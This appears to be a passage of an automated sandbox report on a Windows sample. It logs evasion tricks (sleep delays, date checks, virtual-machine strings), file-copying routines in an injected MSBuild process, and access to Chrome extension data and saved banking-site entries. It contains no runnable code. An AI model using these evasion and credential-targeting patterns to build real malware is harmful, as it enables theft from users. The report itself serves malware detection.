Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Found decision node followed by non-executed suspicious APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found evasive API chain (date check)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Evasive API call chain: GetSystemTime,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe TID: 5396 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe TID: 5396 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe TID: 8548 Thread sleep time: -1680000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe TID: 8548 Thread sleep time: -60000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\v7942.exe Code function: 0_2_00007FF68151A96C FindFirstFileExW, 0_2_00007FF68151A96C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00414E70 wsprintfA,FindFirstFileA,DeleteFileA,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose, 3_2_00414E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00407210 ExpandEnvironmentStringsA,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,CopyFileA,DeleteFileA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose, 3_2_00407210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040B6B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindClose, 3_2_0040B6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00415EB0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose, 3_2_00415EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00408360 FindFirstFileA,CopyFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindClose, 3_2_00408360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00413FD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose, 3_2_00413FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004013F0 FindFirstFileA,FindClose,FindNextFileA,strlen,FindFirstFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,DeleteFileA,FindClose, 3_2_004013F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00413580 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindClose, 3_2_00413580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004097B0 FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA, 3_2_004097B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040ACD0 wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strlen,lstrlenA,DeleteFileA,CopyFileA,FindClose, 3_2_0040ACD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00408C90 lstrcpyA,lstrcatA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,FindFirstFileA,FindNextFileA,strlen,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,FindClose,FindClose,DeleteFileA,_invalid_parameter_noinfo_noreturn, 3_2_00408C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00414950 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,strlen,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 3_2_00414950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00409560 ??2@YAPAXI@Z,??2@YAPAXI@Z,_invalid_parameter_noinfo_noreturn,FindFirstFileA,FindNextFileA,strlen,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA, 3_2_00409560
Source: C:\ProgramData\ph4eu37qie.exe Code function: 26_2_00007FF70668A96C FindFirstFileExW, 26_2_00007FF70668A96C
Source: C:\ProgramData\zmgdjecba1.exe Code function: 30_2_00007FF707B1A96C FindFirstFileExW, 30_2_00007FF707B1A96C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_0040DD70 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 32_2_0040DD70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00413AF0 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 3_2_00413AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040FDD0 GetSystemInfo,wsprintfA, 3_2_0040FDD0
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: chrome.exe, 00000025.00000002.2030338097.00000E7C00D2C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware
Source: MSBuild.exe, 0000001D.00000002.1844271144.0000000000B71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: chrome.exe, 00000009.00000002.1490824938.0000011BC023A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partitionllc
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC24C2000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2018562063.000002351CB89000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: Web Data.18.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: chrome.exe, 00000009.00000003.1454189158.0000011BC255B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1447866318.0000011BC257A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global
Source: Web Data.18.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Web Data.18.dr Binary or memory string: global block list test formVMware20,11696428655
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.1839342332.0000000001358000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.1866919872.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000020.00000002.2340668311.0000000001027000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000020.00000002.2340668311.0000000001082000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC2496000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: Web Data.18.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: chrome.exe, 00000009.00000003.1454189158.0000011BC255B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: y4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Costmber
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC24C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisori
Source: 4TzoHWrzkq4Uuk1w.exe, 00000023.00000002.2722532327.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Web Data.18.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: chrome.exe, 00000009.00000003.1446595083.0000011BC25C6000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1447352895.0000011BC25C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC249F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partition
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC24C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC24C2000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2020779263.0000023520B80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V kxtndfrtkiaxpqf Bus Pipes
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC249F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus PipeslB
Source: chrome.exe, 00000009.00000003.1447626497.0000011BC258C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892
Source: chrome.exe, 00000009.00000002.1490824938.0000011BC01F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service;/
Source: Web Data.18.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC2450000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration ServiceNx~
Source: Web Data.18.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Web Data.18.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Web Data.18.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Web Data.18.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC2496000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: MSBuild.exe, 00000020.00000002.2340668311.0000000001027000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: chrome.exe, 00000025.00000002.2128136639.00000E7C017B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=3edc3865-a0d9-4df1-939a-c974344b9bab
Source: Web Data.18.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC24C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service.
Source: chrome.exe, 00000009.00000003.1448146346.0000011BC2558000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Mon
Source: chrome.exe, 00000009.00000002.1490824938.0000011BC01F5000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2018562063.000002351CBED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V kxtndfrtkiaxpqf Bus
Source: chrome.exe, 00000009.00000002.1487568230.0000011BBC4FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V HypervisorPow
Source: Web Data.18.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: chrome.exe, 00000009.00000002.1491369667.0000011BC249F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ::$DATAeHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation 